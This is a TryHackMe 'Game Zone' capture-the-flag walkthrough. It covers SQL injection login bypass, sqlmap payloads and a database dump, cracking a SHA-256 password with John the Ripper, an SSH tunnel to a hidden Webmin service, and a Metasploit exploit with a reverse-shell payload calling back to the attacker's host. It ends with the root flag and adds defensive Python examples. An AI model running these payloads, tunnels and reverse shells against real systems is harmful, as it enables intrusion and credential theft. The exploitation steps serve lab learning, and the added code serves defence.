【THM】Game Zone-Practice

This room covers SQLi (exploiting the vulnerability manually and with SQLMap), cracking a user's hashed password, using SSH tunnelling to reveal a hidden service, and using a Metasploit payload to obtain root.

Task 1 Deploy the vulnerable machine

What is the name of the large cartoon avatar holding a sniper rifle on the forum?

agent 47

Task 2 Obtain access via SQLi

In this task you will learn more about SQL (Structured Query Language) and how queries can potentially be manipulated to communicate with the database.

SQL is a standard language for storing, editing and retrieving data in databases. A query can look like this:

SELECT * FROM users WHERE username = :username AND password := password

On our GameZone machine, when you try to log in it takes the values you entered as username and password and inserts them directly into the query above. If the query finds data you are allowed to log in; otherwise an error message is shown.

This is a potential vulnerability because you can enter another SQL query as the username. That input is written into the query, placed in it and executed.

If our username is admin and the password is ' or 1=1 #, it is inserted into the query and our session is validated.

The SQL query now executed on the web server looks like this:

SELECT * FROM users WHERE username = admin AND password := ' or 1=1 #

The extra SQL we entered as the password changes the query above: it breaks out of the original query and continues (with the admin user) if 1==1, then comments out the rest of the query so it does not interfere.

There is no admin user in the GameZone database, but you can still log in without knowing any credentials by using the password input from the previous question.

Use ' or 1=1 -- - as your username and leave the password blank.
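To make the mechanism above concrete, here is an added Python example that is not part of the original writeup or of the GameZone application. It builds an in-memory SQLite database with a users(username, pwd) table holding an unsalted SHA-256 hash (the shape sqlmap dumps later in this writeup), then shows the login check written two ways: the vulnerable string-concatenation form the room describes, and the same check with bound parameters. The user and password values are constructed; the function names are mine.

```python
import hashlib
import sqlite3

# Constructed sample data (not the GameZone database): one user whose password
# is stored as an unsalted SHA-256 hex digest.
SAMPLE_USERS = [("agent47", hashlib.sha256(b"example-password").hexdigest())]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database with a users(username, pwd) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Pastes user input straight into the SQL text, the pattern described above.
    A username such as ' or 1=1 -- - turns the WHERE clause into a tautology and
    comments out the password check, so a row is returned without valid credentials."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (
        "SELECT * FROM users WHERE username = '" + username + "' "
        "AND pwd = '" + pwd_hash + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the input is passed as data to the
    database driver and can never change the structure of the statement."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND pwd = ?",
        (username, pwd_hash),
    ).fetchone()
    return row is not None


def demo() -> dict:
    """Run both login variants against the bypass input and real credentials."""
    conn = make_db()
    bypass = "' or 1=1 -- -"  # the username payload used in the room
    return {
        "vulnerable_bypass": login_vulnerable(conn, bypass, ""),
        "safe_bypass": login_safe(conn, bypass, ""),
        "vulnerable_real": login_vulnerable(conn, "agent47", "example-password"),
        "safe_real": login_safe(conn, "agent47", "example-password"),
        "safe_wrong": login_safe(conn, "agent47", "wrong"),
    }


if __name__ == "__main__":
    print(demo())
```

SQLite understands the `--` line comment, which is why the `' or 1=1 -- -` form works here; the `#` comment from the room's first payload is MySQL-specific. The parameterised version is the fix: the same input is compared literally against the username column and finds nothing.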

When you've logged in, what page do you get redirected to?

You are redirected to portal.php.

Task 3 Using SQLMap

sqlmap -r request.txt --dbms=mysql --dump

-r      use the intercepted request you saved earlier
--dbms  tells SQLMap what type of database management system it is
--dump  attempts to output the entire database

The final result is as follows:

---
Parameter: searchitem (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: searchitem=-2609' OR 1334=1334#

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: searchitem=1' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(2371=2371,1))),0x7178717071),2371)-- bUnX

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchitem=1' AND (SELECT 7186 FROM (SELECT(SLEEP(5)))naeg)-- Ohyx

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: searchitem=1' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x70666c71744e687949777748634848576b6669636b486e4a7776646b664e426d557559564f4f4f48,0x7178717071),NULL#
---
Database: db
Table: post
[5 entries]
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | name | description |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Mortal Kombat 11 | Its a rare fighting game that hits just about every note as strongly as Mortal Kombat 11 does. Everything from its methodical and deep combat. |
| 2 | Marvel Ultimate Alliance 3 | Switch owners will find plenty of content to chew through, particularly with friends, and while it may be the gaming equivalent to a Hulk Smash, that isnt to say that it isnt a rollicking good time. |
| 3 | SWBF2 2005 | Best game ever |
| 4 | Hitman 2 | Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing. |
| 5 | Call of Duty: Modern Warfare 2 | When you look at the total package, Call of Duty: Modern Warfare 2 is hands-down one of the best first-person shooters out there, and a truly amazing offering across any system. |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
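The four payload families sqlmap reports above (boolean-based, error-based, time-based and UNION) are also what a defender should be looking for in request logs. The following added Python example, which is not part of the original writeup or of sqlmap, runs a small signature set over constructed log lines in a made-up `timestamp client method path query` format; the payload values are the ones from the sqlmap output above, URL-encoded the way a client would send them. The function names and the log format are mine.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, quote_plus

# Signatures for the injection techniques sqlmap reported, matched on the
# URL-decoded parameter value (case-insensitive).
SIGNATURES = [
    ("boolean-based", re.compile(r"'\s*(?:or|and)\s+\d+\s*=\s*\d+", re.I)),
    ("error-based", re.compile(r"\b(?:gtid_subset|extractvalue|updatexml)\s*\(", re.I)),
    ("time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]

# Constructed log line layout (not a real server format): ts client method path query.
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<path>\S+) (?P<query>.*)$")


def make_log_line(client: str, searchitem: str) -> str:
    """Build one constructed log line; the value is URL-encoded as a browser would send it."""
    return f"2024-01-18T10:50:31Z {client} POST /portal.php searchitem={quote_plus(searchitem)}"


# Sample traffic: the payload shapes from the sqlmap output above plus one benign search.
SAMPLE_LOG = [
    make_log_line("10.0.0.5", "-2609' OR 1334=1334#"),
    make_log_line("10.0.0.5", "1' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(2371=2371,1))),0x7178717071),2371)-- bUnX"),
    make_log_line("10.0.0.5", "1' AND (SELECT 7186 FROM (SELECT(SLEEP(5)))naeg)-- Ohyx"),
    make_log_line("10.0.0.5", "1' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x70,0x7178717071),NULL#"),
    make_log_line("10.0.0.9", "Hitman 2"),
]


def classify_value(value: str) -> List[str]:
    """Return the names of every signature that matches a decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def detect(lines: List[str]) -> List[Dict]:
    """Parse each line, decode every query parameter and report matching techniques."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the constructed format
        for param, values in parse_qs(m["query"]).items():
            for value in values:
                hits = classify_value(value)
                if hits:
                    findings.append({"client": m["client"], "param": param,
                                     "value": value, "techniques": hits})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["client"], f["param"], f["techniques"])
```

Decoding before matching matters: sqlmap sends the quote and the `#` comment percent-encoded, so signatures run on the raw query string would miss them. A benign search such as "Hitman 2" produces no finding.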

Task 4 Cracking a password with JohnTheRipper

John the Ripper (JTR) is a fast, free and open-source password cracker; it comes preinstalled on every Kali Linux machine.

We will use JTR to crack the hashed password value we obtained earlier. JohnTheRipper is 15 years old, and of course there are other password crackers such as HashCat.

JohnTheRipper works by taking a wordlist of passwords, hashing each word with the specified hash algorithm, and comparing the result with the target hash (the hashed password value). If the two hashes are identical, the plaintext behind the target hash has been found, i.e. it is cracked. Because we cannot reverse the target hash directly to recover the plaintext, we have to guess it by comparing hashes.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=Raw-SHA256

hash.txt - contains your list of hashes (in your case it has only 1 hash)
--wordlist - is the wordlist used to find the de-hashed value
--format - is the hashing algorithm used. In our case it is hashed with SHA256.
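The comparison loop described above, and the storage choice that blunts it, as an added Python example that is not part of the original writeup or of John the Ripper. It assumes a constructed four-word list standing in for rockyou.txt, and uses the standard library's PBKDF2-HMAC-SHA256 with a per-user random salt for the hardened variant; the function names dictionary_match, store_password and verify_password are mine. The 600,000 iteration count is the OWASP Password Storage Cheat Sheet recommendation for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Constructed wordlist standing in for rockyou.txt (not the real file).
SAMPLE_WORDLIST = ["password", "letmein", "videogamer124", "qwerty"]


def sha256_hex(word: str) -> str:
    """Unsalted SHA-256 hex digest, the Raw-SHA256 format the dump above uses."""
    return hashlib.sha256(word.encode()).hexdigest()


def dictionary_match(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """What JTR does for Raw-SHA256: hash every candidate and compare with the target.
    One pass over the list covers every user whose hash is stored this way, because
    there is no salt to make the hashes differ per user."""
    for word in wordlist:
        if hmac.compare_digest(sha256_hex(word), target_hex):
            return word
    return None


# Hardened storage: salted, iterated PBKDF2-HMAC-SHA256. Each guess now costs
# PBKDF2_ITERATIONS hash computations, and the salt means a leaked table cannot be
# attacked with one shared wordlist pass.
PBKDF2_ITERATIONS = 600_000


def store_password(password: str) -> str:
    """Return a self-describing record: algorithm$iterations$salt_hex$hash_hex."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(stored: str, candidate: str) -> bool:
    """Recompute the derived key with the stored salt and iteration count."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    target = sha256_hex("videogamer124")  # constructed target, hashed here
    print("raw sha256 matched:", dictionary_match(target, SAMPLE_WORDLIST))
    record = store_password("videogamer124")
    print("pbkdf2 verify:", verify_password(record, "videogamer124"))
```

The john run below reports roughly 18 million candidates per second against Raw-SHA256; with the iterated, salted form each candidate costs hundreds of thousands of hash operations and has to be recomputed for every user's salt.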

What is the de-hashed password?

┌──(root㉿kali)-[~]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2024-01-17 21:55) 6.250g/s 18227Kp/s 18227Kc/s 18227KC/s vimivi..veluca
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.

videogamer124

ssh agent47@10.10.185.223

Task 5 Exposing services with reverse SSH tunnels

Reverse SSH port forwarding specifies that a given port on the remote server host is forwarded to a given host and port on the local side.

-L is a local tunnel (YOU <-- CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do ssh -L 9000:imgur.com:80 user@example.com. Going to localhost:9000 on your machine will load imgur traffic using your other server.

-R is a remote tunnel (YOU --> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.

We will use a tool called ss to investigate the sockets running on the host.

If we run ss -tulpn, it tells us which socket connections are running.

Argument   Description
-t         Display TCP sockets
-u         Display UDP sockets
-l         Display only listening sockets
-p         Show the process using the socket
-n         Don't resolve service names

In the previous task we already connected to the target machine over SSH, so we can run ss -tulpn on the target from that SSH session.

agent47@gamezone:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
agent47@gamezone:~$ netstat -tnlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -

We can see that the service running on port 10000 is blocked from the outside by a firewall rule (we can see this from the iptables list). But using an SSH tunnel we can expose the port to ourselves (locally)!

On your local machine, run ssh -L 10000:localhost:10000 <user>@<ip>

ssh -L 10000:localhost:10000 agent47@10.10.185.223

Once that is done, type localhost:10000 into the browser to access the newly exposed web server.
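The lesson for the defending side is that a host firewall only hides a listener from the network; any account with a shell on the box still reaches it, and an ssh -L tunnel as above extends that reach to the outside. The following added Python example, not part of the original writeup or of the ss tool, parses the ss -tulpn output captured above (embedded as the sample input) and reports listeners bound on all interfaces that are not on an allowlist, plus loopback-only services that a tunnel would expose. The function names and the allowlist are mine.

```python
from typing import Dict, List, Set, Tuple

# The `ss -tulpn` output captured on the target above, used here as sample input.
SAMPLE_SS_OUTPUT = """\
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
"""

# Addresses that mean "this host only". '*' and '::' are the IPv4/IPv6 wildcards.
LOOPBACK = {"127.0.0.1", "::1"}


def split_addr_port(local: str) -> Tuple[str, int]:
    """Split ss's Local Address:Port column on the last colon, so that
    '*:22' -> ('*', 22), ':::80' -> ('::', 80), '127.0.0.1:3306' -> ('127.0.0.1', 3306)."""
    addr, _, port = local.rpartition(":")
    return addr, int(port)


def parse_ss(text: str) -> List[dict]:
    """Turn ss -tulpn output into one dict per socket (header row skipped)."""
    rows = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue  # not a socket row
        addr, port = split_addr_port(fields[4])
        rows.append({"proto": fields[0], "state": fields[1], "addr": addr, "port": port})
    return rows


def audit_listeners(text: str, allowed_ports: Set[int]) -> Dict[str, List[Tuple[str, int]]]:
    """Report (proto, port) pairs bound on every interface that are not allowlisted,
    and loopback-only services, which any local shell (or an SSH tunnel) can reach."""
    report: Dict[str, List[Tuple[str, int]]] = {"unexpected_exposed": [], "loopback_only": []}
    for r in parse_ss(text):
        key = (r["proto"], r["port"])
        if r["addr"] in LOOPBACK:
            bucket = report["loopback_only"]
        elif r["port"] not in allowed_ports:
            bucket = report["unexpected_exposed"]
        else:
            continue
        if key not in bucket:
            bucket.append(key)
    return report


if __name__ == "__main__":
    # Assumed allowlist for this host: SSH and the web server only.
    print(audit_listeners(SAMPLE_SS_OUTPUT, {22, 80}))
```

On the captured output this flags Webmin on tcp/udp 10000 (and DHCP client on udp 68) as bound on every interface, and MySQL on 127.0.0.1:3306 as loopback-only. Binding a management service to loopback and relying on iptables, as on this box, is weaker than requiring authentication on the service itself, since the tunnel step above bypasses the firewall entirely.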

What is the name of the exposed CMS?

webmin

What is the CMS version?

1.580

Task 6 Privilege Escalation with Metasploit

set payload cmd/unix/reverse

msf6 exploit(unix/webapp/webmin_show_cgi_exec) > options

Module options (exploit/unix/webapp/webmin_show_cgi_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD videogamer124 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 10000 yes The target port (TCP)
SSL false yes Use SSL
USERNAME agent47 yes Webmin Username
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.11.63.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Webmin 1.580



View the full module info with the info, or info -d command.
python -c 'import pty; pty.spawn("/bin/bash")'
cat /root/root.txt
a4b945830144bdd71908d12d902adeee